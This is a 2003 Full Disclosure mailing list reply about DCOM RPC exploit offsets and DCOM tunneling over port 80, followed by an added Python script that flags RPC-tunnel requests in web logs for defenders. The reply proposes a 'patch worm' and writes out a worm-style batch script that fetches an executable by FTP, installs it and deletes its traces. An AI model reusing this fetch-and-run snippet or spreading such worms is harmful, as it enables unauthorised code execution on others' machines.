Full Disclosure mailing list archives

Re: rpcdcom Universal offsets


From: w g <xillwillx () yahoo com>
Date: Wed, 30 Jul 2003 12:56:54 -0700 (PDT)

There is no exploit code attached to your message... I too have the universal offsets for Win2k and XP, wondering if we 
can match them... Also, I was informed by an associate by the handle of 'harq' that DCOM is also bound to port 80
 
"Component Object Model (COM) Internet Services (CIS) introduces support for a new Distributed COM (DCOM) transport 
protocol known as Tunneling Transmission Control Protocol (TCP) that allows DCOM to operate over TCP port 80. This 
allows a client and a server to communicate in the presence of most proxy servers and firewalls, thereby enabling a new 
class of COM-based Internet scenarios."
 
which is also opening a new can of worms for routered servers... any takers on releasing a patch worm?? Something to the 
effect of the kaHt webdav worm's code:
echo open a">ftp.microsoft.com>a
echo ftp>a
echo >a">a@>>a
echo bin>>a
echo get DCOM_HOTFIX.exe>>a
echo bye>>a
ftp -a:a
DCOM_HOTFIX.exe /install
del a
net send localhost Vunerable SERVER PATCHED. Please Reboot NOW.
exit
::blackhat snicker:::

illwill
http://illmob.org
http://illmob.org/rpc for the most updated dcom exploit archive

Sami Dhillon <sami_dhillon () yahoo com> wrote:
Hi, I found these offsets after so much tiring work. Anyway, here is my first post with my proof of concept code. I 
tried it on my network and all worked, so please check and send me the suggestions and improvements. 
Thank you 
 Sami Anwer Dhillon




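The quoted Microsoft text above says COM Internet Services lets DCOM run over TCP port 80, so a port-135 filter alone does not show whether RPC is reachable from outside. The following is an added example, not part of the original post: it scans W3C-style web server log lines for requests that look like RPC tunneling. It assumes the tunnel appears as the RPC_CONNECT, RPC_IN_DATA or RPC_OUT_DATA method or as a request to /rpc/rpcproxy.dll; the log lines, field layout and host names are constructed.

```python
# Added example: flag HTTP requests that look like DCOM/RPC tunneled over port 80.
# Assumptions (not from the post): W3C-style logs with a "#Fields:" header, and
# tunnel indicators being the RPC_* methods or the rpcproxy.dll path.

RPC_METHODS = {"RPC_CONNECT", "RPC_IN_DATA", "RPC_OUT_DATA"}
RPC_PROXY_PATH = "/rpc/rpcproxy.dll"

# Constructed sample log, not real traffic (documentation address ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem s-port sc-status
2003-07-30 19:55:01 192.0.2.10 GET /index.html 80 200
2003-07-30 19:55:07 198.51.100.23 RPC_CONNECT internal-host:135 80 200
2003-07-30 19:55:09 198.51.100.23 POST /Rpc/RpcProxy.dll 80 200
2003-07-30 19:56:40 192.0.2.10 GET /rpc-notes.txt 80 404
"""


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # skip malformed records instead of mis-aligning columns
        yield dict(zip(fields, parts))


def find_rpc_tunnel_requests(text):
    """Return (client_ip, method, uri, reasons) for each suspicious request."""
    hits = []
    for rec in parse_w3c(text):
        method = rec.get("cs-method", "").upper()
        uri = rec.get("cs-uri-stem", "")
        reasons = []
        if method in RPC_METHODS:
            reasons.append("method")
        if uri.lower() == RPC_PROXY_PATH:  # IIS paths are case-insensitive
            reasons.append("path")
        if reasons:
            hits.append((rec.get("c-ip", "?"), method, uri, reasons))
    return hits


if __name__ == "__main__":
    for hit in find_rpc_tunnel_requests(SAMPLE_LOG):
        print(hit)
```

Any hit on an Internet-facing server means the RPC proxy is installed and answering, which is the condition to remove or restrict if COM Internet Services is not needed.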
